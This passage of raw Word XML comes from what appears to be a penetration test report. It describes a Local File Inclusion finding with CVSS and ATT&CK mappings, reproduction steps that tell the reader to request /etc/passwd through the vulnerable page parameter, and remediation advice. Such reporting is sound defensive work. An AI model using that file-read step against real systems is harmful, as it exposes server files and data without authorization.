      <w:bookmarkEnd w:id="1606917974"/>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303980FD">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DDB5B08" w14:textId="0C27D68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D3213D6" w14:textId="2F023D6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B63F05" w14:textId="50B52F0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D06DF06">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D2A75A" w14:textId="57CCAD1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C11B516" w14:textId="4EAF2DE8">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52A01C95" w:rsidP="0D325B6E" w:rsidRDefault="52A01C95" w14:paraId="008FE3C0" w14:textId="05CD311D">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52A01C95">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>6.</w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="4552F2DA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>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8FFDE6C" w14:textId="682F9BA7">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2D7F9AA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24C6624" w14:textId="2B68250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4DEB55E9" w14:textId="52C8E6CD">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081843AF"/>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F230D7A"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="4A8C0911">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B4F4B0" w14:textId="67A2D24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51BEA02" w:rsidP="0D325B6E" w:rsidRDefault="651BEA02" w14:paraId="1C8DF211" w14:textId="54B32EF3">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" r:id="R5e1e7ec32cc84dbc">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="651BEA02">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/S</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="4A52CD36">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>A:N</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="264C1E1A">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57620BD" w14:textId="0F64419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26B56A0" w:rsidP="0D325B6E" w:rsidRDefault="226B56A0" w14:paraId="10EDCC99" w14:textId="6F3034FB">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="226B56A0">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1B1BFA1" w14:textId="0A4D4018">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R7026ee0586f24dee">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T10</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="582143DC">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>05</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0B82A6A2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="582143DC">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> Data from Local System</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="3A4FEAC8" w:rsidP="0D325B6E" w:rsidRDefault="3A4FEAC8" w14:paraId="21D3EBA0" w14:textId="49A52B39">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rea46cd942a574e79">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="3A4FEAC8">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1083</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="04782383">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="3A4FEAC8">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> File and Directory Discovery</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="6B7D8AD6">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312A594"/>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9CB8DE" w:rsidP="0D325B6E" w:rsidRDefault="0D9CB8DE" w14:paraId="6596436F" w14:textId="41847600">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="0D9CB8D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09890F9" w:rsidP="0D325B6E" w:rsidRDefault="609890F9" w14:paraId="63325068" w14:textId="761A77D5">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71d11973865a43f8">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="609890F9">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1057</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="457476EC">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609890F9">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Data Loss Prevention</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="31FDD0A4" w:rsidP="0D325B6E" w:rsidRDefault="31FDD0A4" w14:paraId="1D3FE8CD" w14:textId="1AE2831E">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R4c290ea28726464c">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="31FDD0A4">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1022</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="072E9829">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>: Restrict File and Directory Permissions</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="7D0B6B1C" w:rsidP="0D325B6E" w:rsidRDefault="7D0B6B1C" w14:paraId="7B480512" w14:textId="005119DA">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R50b1373ea08644f1">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7D0B6B1C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1048: Application Isolation and Sandboxing</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="032F38A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489B362" w14:textId="4633A3C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0EB9AE7" w14:textId="216F6856">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41C746CB" w14:textId="53B205EC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="246A774E" w:rsidP="0D325B6E" w:rsidRDefault="246A774E" w14:paraId="474BC959" w14:textId="3D37B6B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FB0032D" w:rsidP="0D325B6E" w:rsidRDefault="3FB0032D" w14:paraId="1D83734E" w14:textId="77AD8167">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pP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3FB0032D">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 xml:space="preserve"> parameter under </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3FB0032D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/documents</w:t>
      </w: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 xml:space="preserve"> is vulnerable to Local File Inclusion, giving an attacker the ability to read any file on the backend server that the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3FB0032D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>www-data</w:t>
      </w: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 xml:space="preserve"> user has </w:t>
      </w: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permission</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3FB0032D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="440C089B" w14:textId="420A94E7">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46A774E" w:rsidP="0D325B6E" w:rsidRDefault="246A774E" w14:paraId="2A100AE6" w14:textId="70E59587">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46A774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7A512B0" w:rsidP="0D325B6E" w:rsidRDefault="77A512B0" w14:paraId="25A25D79" w14:textId="0FF7783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7A512B0">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abuse the vulnerability to access sensitive customer and business data, configuration files, databases, and </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="06507703">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>proprietary</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="77A512B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> code stored on the backend system. Attackers will gain more information about the system w</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="39669F89">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">hich they can use to find further </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0F19B28C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="39669F89">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="34756881" w14:textId="63BBF3AD">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246A774E" w:rsidP="0D325B6E" w:rsidRDefault="246A774E" w14:paraId="76A5CCE0" w14:textId="2955CE7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46A774E" w:rsidP="0D325B6E" w:rsidRDefault="246A774E" w14:paraId="7BEA21C3" w14:textId="179EFAC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D325B6E" w:rsidR="246A774E">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D325B6E" w:rsidR="246A774E">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w:rsidR="246A774E" w:rsidP="0D325B6E" w:rsidRDefault="246A774E" w14:paraId="10E76488" w14:textId="3A90155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59FF70D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Under the page parameter enter path to a local file that should not be accessible through the website, such as /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="246A774E" w:rsidP="0D325B6E" w:rsidRDefault="246A774E" w14:paraId="7F58BA2A" w14:textId="76605B0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459BE675">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Examine the file contents displayed on the web page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0E107910" w14:textId="39ADAC9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7D68C516" w14:textId="5E2BDDC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FA1E4DE" w14:textId="6B7FB36D">
      <w:pPr>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246A774E" w:rsidP="0D325B6E" w:rsidRDefault="246A774E" w14:paraId="22E530EA" w14:textId="0B246F2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37CBB6EA" w:rsidP="0D325B6E" w:rsidRDefault="37CBB6EA" w14:paraId="76B7F68E" w14:textId="30B899C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7CBB6E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37CBB6E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r w:rsidRPr="0D325B6E" w:rsidR="35F191E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4F407630" w:rsidP="0D325B6E" w:rsidRDefault="4F407630" w14:paraId="547D1D5F" w14:textId="2D0D60DD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>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F407630">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Avoid passing filenames in user input</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="635A5B51">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F407630">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> including direct user input as well as other data sources that can be manipulated by the attacker, such as cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1A33FDE5" w:rsidP="0D325B6E" w:rsidRDefault="1A33FDE5" w14:paraId="759B3083" w14:textId="7260E033">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>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f</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06432E4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="606432E4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> access through user input is </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equired</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 xml:space="preserve">, create a whitelist of safe file paths. </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="694AB917">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 xml:space="preserve">n cases where a </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1A33FDE5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
